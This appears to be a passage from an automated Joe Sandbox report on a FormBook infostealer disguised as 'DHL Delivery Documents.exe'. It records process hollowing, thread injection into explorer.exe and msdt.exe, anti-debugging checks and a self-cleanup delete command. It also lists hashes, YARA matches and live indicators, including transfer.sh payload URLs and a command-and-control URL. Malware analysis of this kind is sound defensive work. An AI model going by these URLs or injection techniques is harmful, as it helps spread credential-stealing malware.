          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: EB0000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BFF008
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.301326680.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.334866837.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.316167591.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.339922682.0000000005E10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.344779338.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Documents.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception712
          Process Injection          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)712
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items11
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562120 Sample: DHL Delivery Documents.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus detection for URL or domain 2->35 37 7 other signatures 2->37 10 DHL Delivery Documents.exe 14 3 2->10         started        process3 dnsIp4 29 transfer.sh 144.76.136.153, 443, 49751, 49752 HETZNER-ASDE Germany 10->29 27 C:\Users\...\DHL Delivery Documents.exe.log, ASCII 10->27 dropped 45 Writes to foreign memory regions 10->45 47 Allocates memory in foreign processes 10->47 49 Injects a PE file into a foreign processes 10->49 15 aspnet_compiler.exe 10->15         started        file5 signatures6 process7 signatures8 51 Modifies the context of a thread in another process (thread injection) 15->51 53 Maps a DLL or memory area into another process 15->53 55 Sample uses process hollowing technique 15->55 57 2 other signatures 15->57 18 explorer.exe 15->18 injected process9 process10 20 msdt.exe 18->20         started        signatures11 39 Modifies the context of a thread in another process (thread injection) 20->39 41 Maps a DLL or memory area into another process 20->41 43 Tries to detect virtualization through RDTSC time measurements 20->43 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL Delivery Documents.exe31%VirustotalBrowse
          DHL Delivery Documents.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.microsoft.c0%URL Reputationsafe
          http://crl.microf0%Avira URL Cloudsafe
          http://crl.micros.0%Avira URL Cloudsafe
          www.trabaho-academy.net/zqzw/1%VirustotalBrowse
          www.trabaho-academy.net/zqzw/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          transfer.sh
          		144.76.136.153
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://transfer.sh/get/mVKia7/BINCC.txtfalse
              		high
              www.trabaho-academy.net/zqzw/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: malware
              		low
              https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://transfer.shDHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.microsoft.cDHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesLDHL Delivery Documents.exefalse
                    		high
                    http://crl.microfDHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.micros.DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtxDHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        144.76.136.153
                        		transfer.shGermany
                        		24940HETZNER-ASDEfalse

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:562120
                        Start date:28.01.2022
                        Start time:14:02:32
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 52s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:DHL Delivery Documents.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:18
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 64% (good quality ratio 58.7%)
                        • Quality average: 71.6%
                        • Quality standard deviation: 31.2%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        14:03:32API Interceptor1x Sleep call for process: DHL Delivery Documents.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Delivery Documents.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1076
                        Entropy (8bit):5.368419236023932
                        Encrypted:false
                        SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKEYHKGD8AoPtHTG1hAHKKPN+vxpNT
                        MD5:BA59E2E532D7B32DDB5669F4DDA552B9
                        SHA1:56321A97094257CE0B8DD955B6F433D971093890
                        SHA-256:C46FC927838D524FB8361EA17F8BB19694C7175106544FE95367E5DF8BD9891B
                        SHA-512:2F1702E762B6DA239580311D0EEFF203DA8D584D6B5E0922DB730A4CE770DA46B750C380B70D3BED632DFBE28CAAB27B6067EEE57C152EE51828E03E5BA2214F
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V

                        Static File Info

                        General

                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):6.616131066331666
                        TrID:
                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                        • Win64 Executable GUI (202006/5) 46.43%
                        • Win64 Executable (generic) (12005/4) 2.76%
                        • Generic Win/DOS Executable (2004/3) 0.46%
                        • DOS Executable Generic (2002/1) 0.46%
                        File name:DHL Delivery Documents.exe
                        File size:48640
                        MD5:5bc8492c9f262d1f9840635b87edf9c5
                        SHA1:da867a8b837e43c91414ff46d239ab95b799d04b
                        SHA256:7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
                        SHA512:a9f75f93607443861c6b2ec9f242faacda666967cb6cbdab8cb8c8f208047a7a90448046242aead694fe391a2bbcb9f52688bdbee08bf492cb511f71748a365e
                        SSDEEP:768:24jw5Zoo7adxM2GzRpAgka/8HHUTQQQQQQQBdy3bI91GN6bcE/2ihWSCAtkrjL1X:2Awzf3Rpga/eHUTQQQQQQQBdBgN6b5/S
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....+.a.................8............... ....@...... ....................................@...@......@............... .....

                        File Icon

                        Icon Hash:a289a9ed6da39200

                        Static PE Info

                        General

                        Entrypoint:0x400000
                        Entrypoint Section:
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61F32B10 [Thu Jan 27 23:30:24 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:

                        Entrypoint Preview

                        Instruction
                        dec ebp
                        pop edx
                        nop
                        add byte ptr [ebx], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x8328.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x57960x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
